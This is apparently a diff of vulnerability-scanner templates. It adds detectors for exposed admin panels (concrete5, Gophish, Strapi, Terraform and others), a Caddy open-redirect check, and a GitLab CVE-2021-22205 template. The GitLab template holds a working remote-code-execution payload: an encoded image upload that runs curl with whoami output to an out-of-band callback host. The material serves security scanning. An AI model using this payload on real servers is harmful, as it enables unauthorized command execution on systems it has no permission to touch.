words:
- '<title>Install concrete5</title>'
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version ([0-9.]+)'

33
exposed-panels/concrete5/concrete5-panel.yaml Normal file
View File

@ -0,0 +1,33 @@
id: concrete5-panel
info:
name: Concrete5 Panel
author: dhiyaneshDk
severity: info
metadata:
shodan-query: http.title:"concrete5"
tags: panel,concrete5,cms
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/login'
redirects: true
max-redirects: 2
matchers:
- type: regex
part: body
regex:
- '(?mi)<title>(.*)concrete5(.*)<\/title>'
- '(?mi)content="concrete5 - (.*)'
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- 'content="concrete5 \- ([0-9.]+)"\/>'
- 'Version ([0-9.]+)'

23
exposed-panels/gophish-login.yaml Normal file
View File

@ -0,0 +1,23 @@
id: gophish-login
info:
name: Gophish Login
author: dhiyaneshDK
severity: info
tags: panel,gophish
metadata:
shodan-query: http.title:"Gophish - Login"
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Gophish - Login</title>'
- type: status
status:
- 200

25
exposed-panels/qualcomm-voip-router.yaml Normal file
View File

@ -0,0 +1,25 @@
id: qualcomm-voip-router
info:
name: Qualcomm 4G LTE WiFi VoIP-Router
author: pussycat0x
severity: info
metadata:
fofa-dork: 'app="Qualcomm-4G-LTE-WiFi-VoIP-Router"'
tags: panel,qualcomm,iot,router,voip
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>4G LTE WiFi VoIP Router</title>'
- type: status
status:
- 200

25
exposed-panels/strapi-documentation.yaml Normal file
View File

@ -0,0 +1,25 @@
id: strapi-documentation
info:
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
author: idealphase
severity: info
tags: strapi
requests:
- method: GET
path:
- '{{BaseURL}}/documentation'
matchers-condition: and
matchers:
- type: word
words:
- "<title>Swagger UI</title>"
- "x-strapi-config"
- "https://strapi.io/documentation/"
- type: status
status:
- 200

25
exposed-panels/terraform-enterprise-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: terraform-enterprise-panel
info:
name: Terraform Enterprise Panel
author: Adam Crosser
severity: info
tags: panel,terraform
requests:
- method: GET
path:
- '{{BaseURL}}/session'
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- "Terraform Enterprise"
extractors:
- type: regex
group: 1
regex:
- '(?i)<title>([A-Za-z 0-9.]+)</title>'

20
exposed-panels/versa-sdwan.yaml Normal file
View File

@ -0,0 +1,20 @@
id: versa-sdwan
info:
name: Versa Networks SD-WAN Application
author: pdteam
severity: info
tags: panel,versa,sdwan
requests:
- method: GET
path:
- "{{BaseURL}}/versa/login.html"
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- "Versa Networks"

2
exposures/configs/awstats-config.yaml
View File

@ -4,7 +4,7 @@ info:
name: AWStats config name: AWStats config
author: sheikhrishad author: sheikhrishad
severity: info severity: info
tags: config,exposure tags: config,exposure,awstats
requests: requests:
- method: GET - method: GET

4
exposures/configs/awstats-script.yaml
View File

@ -4,7 +4,7 @@ info:
name: AWStats script name: AWStats script
author: sheikhrishad author: sheikhrishad
severity: info severity: info
tags: config,exposure tags: config,exposure,awstats
requests: requests:
- method: GET - method: GET
@ -20,9 +20,9 @@ requests:
- "Do not remove this line" - "Do not remove this line"
- type: word - type: word
part: header
words: words:
- "application/x-perl" - "application/x-perl"
part: header
- type: status - type: status
status: status:

22
iot/liveview-axis-camera.yaml
View File

@ -1,7 +1,7 @@
id: liveview-axis-camera id: liveview-axis-camera
info: info:
name: Live view AXIS Network Camera name: Live View AXIS Network Camera
author: dhiyaneshDK author: dhiyaneshDK
severity: info severity: info
reference: https://www.exploit-db.com/ghdb/6843 reference: https://www.exploit-db.com/ghdb/6843
@ -11,11 +11,17 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/view/viewer_index.shtml' - '{{BaseURL}}/view/viewer_index.shtml'
matchers-condition: and
matchers-condition: or
matchers: matchers:
- type: word - type: dsl
words: dsl:
- 'Live view - AXIS' - 'status_code == 200'
- type: status - 'contains(tolower(body), "live view - axis")'
status: condition: and
- 200
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(tolower(body), "/incl/axis_connection.js")'
condition: and

4
misconfiguration/apc-info.yaml
View File

@ -4,13 +4,15 @@ info:
name: APCu service information leakage name: APCu service information leakage
author: koti2 author: koti2
severity: low severity: low
tags: config,service tags: config,service,apcu
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/apc/apc.php" - "{{BaseURL}}/apc/apc.php"
- "{{BaseURL}}/apc.php" - "{{BaseURL}}/apc.php"
stop-at-first-match: true
matchers: matchers:
- type: word - type: word
words: words:

19
misconfiguration/caddy-open-redirect.yaml Normal file
View File

@ -0,0 +1,19 @@
id: caddy-open-redirect
info:
name: Caddy 2.4.6 Open Redirect (php_fastcgi)
author: dhiyaneshDK
severity: medium
reference: https://github.com/caddyserver/caddy/issues/4502
tags: redirect,caddy,server
requests:
- method: GET
path:
- '{{BaseURL}}//example.com/%2F..'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

20
misconfiguration/misconfigured-concrete5.yaml Normal file
View File

@ -0,0 +1,20 @@
id: misconfigured-concrete5
info:
name: Misconfigured Concrete5
author: pdteam
severity: low
tags: misconfig,concrete,cms
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- 'concrete5 has encountered an issue'

63
vulnerabilities/gitlab/gitlab-rce.yaml Normal file
View File

@ -0,0 +1,63 @@
id: gitlab-rce
info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool
author: pdteam
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
reference:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-22205
cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce,oast,intrusive
requests:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /uploads/user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'Failed to process image'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 422
extractors:
- type: regex
name: csrf-token
internal: true
group: 1
regex:
- 'csrf-token" content="(.*?)" />\n\n<meta'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'

11
workflows/concrete-workflow.yaml Normal file
View File

@ -0,0 +1,11 @@
id: concrete-workflow
info:
name: Concrete Security Checks
author: dhiyaneshDK
description: A simple workflow that runs all Concrete related nuclei templates on a given target.
workflows:
- template: exposed-panels/concrete5/concrete5-panel.yaml
subtemplates:
- tags: concrete

11
workflows/gophish-workflow.yaml Normal file
View File

@ -0,0 +1,11 @@
id: gophish-workflow
info:
name: GoPhish Security Checks
author: dhiyaneshDK
description: A simple workflow that runs all Go-Phish related nuclei templates on a given target.
workflows:
- template: exposed-panels/gophish-login.yaml
subtemplates:
- tags: gophish